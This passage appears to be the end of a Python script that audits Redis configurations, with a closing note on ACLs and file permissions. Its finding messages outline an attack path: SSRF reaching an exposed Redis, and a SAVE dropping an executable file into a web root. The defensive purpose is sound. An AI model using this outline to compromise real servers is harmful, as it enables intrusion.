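    bind = conf.get("bind", "").split()
    if not bind or any(addr in ("0.0.0.0", "::", "*") for addr in bind):
        findings.append("bind: listens on every interface, so any host the web "
                        "tier can reach (including via SSRF) can connect")
    if conf.get("protected-mode", "yes").lower() != "yes":
        findings.append("protected-mode: disabled")
    if not conf.get("requirepass"):
        findings.append("requirepass: unset, every connection is unauthenticated")
    for cmd in ABUSED_COMMANDS:
        if renamed.get(cmd) != "":
            findings.append("%s: not disabled with rename-command" % cmd)
    dump_dir = conf.get("dir", "")
    if any(dump_dir == root or dump_dir.startswith(root.rstrip("/") + "/")
           for root in web_roots):
        findings.append("dir: %s is under the web root, so a SAVE drops a file "
                        "the web server will serve or execute" % dump_dir)
    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, "->", audit(conf) or ["no findings"])
```

On Redis 6 and later, ACL rules are the supported way to deny commands per user; rename-command is checked here because it is the directive the writeup's exact command sequence trips over. Independently of the config, running Redis under its own user with no write permission on the web root removes the dir finding even if CONFIG SET is reachable.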